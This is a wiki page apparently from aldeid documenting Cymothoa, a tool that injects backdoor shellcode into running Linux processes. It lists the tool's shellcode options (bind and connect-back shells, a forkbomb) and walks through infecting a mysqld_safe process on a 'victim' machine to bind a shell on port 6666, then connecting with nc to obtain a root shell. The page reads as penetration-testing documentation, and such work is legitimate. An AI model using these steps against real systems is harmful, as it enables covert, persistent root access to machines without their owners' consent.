From aldeid
Jump to navigation Jump to search


Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process.



Backtrack 5 R2 already comes with Cymothoa installed, in /pentest/backdoors/cymothoa/.

From scratch

$ cd ~/src/
$ wget
$ tar xzvf cymothoa-1-beta.tar.gz
$ cd cymothoa-1-beta/
$ make
$ sudo make install



cymothoa -p <pid> -s <shellcode_number> [options]


Main options

process pid
shellcode number
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 -
7 - serial port busybox binding - [email protected] [email protected]
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd
memory region name for shellcode injection (default /lib/ld)
search for "r-xp" permissions, see /proc/pid/maps...
memory region name for persistent memory (default /lib/ld)
search for "rw-p" permissions, see /proc/pid/maps...
print this help screen
list available shellcodes

Injection options (overwrite payload flags)

fork parent process
don't fork parent process
create payload thread (probably you need also -F)
don't create payload thread
pass persistent memory address
don't pass persistent memory address
use alarm scheduler
don't use alarm scheduler
use setitimer scheduler
don't use setitimer scheduler

Payload arguments

set timer (seconds)
set timer (microseconds)
set the IP
set the port number
set the port number 2
set the username (4 bytes)
set the password (8 bytes)
set the script code (ex: "#!/bin/sh\nls; exit 0")
escape codes will not be interpreted


First install cymothoa on the victim's computer. Then check the process ID you want to infect (e.g. mysql, PID=1155)

victim:~/src/cymothoa-1-beta# ps aux | grep mysql
root      1155  0.0  0.1   1752   568 ?        S    21:39   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1273  0.0  4.3 138744 22424 ?        Sl   21:39   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1274  0.0  0.1   1676   560 ?        S    21:39   0:00 logger -t mysqld -p daemon.error
root     26975  0.0  0.1   3324   812 pts/0    S+   21:53   0:00 grep mysql

Then infect the process:

victim:~/src/cymothoa-1-beta# ./cymothoa -p 1155 -s 0 -y 6666
[+] attaching to process 1155

 register info: 
 eax value: 0xfffffe00	 ebx value: 0xffffffff
 esp value: 0xbfbfaffc	 eip value: 0xb7818424

[+] new esp: 0xbfbfaff8
[+] payload preamble: fork
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1155

[+] infected!!!

On the attacker's machine, you should now be able to connect to port 6666:

root@bt:/pentest/backdoors/cymothoa# nc 6666
uid=0(root) gid=0(root) groups=0(root)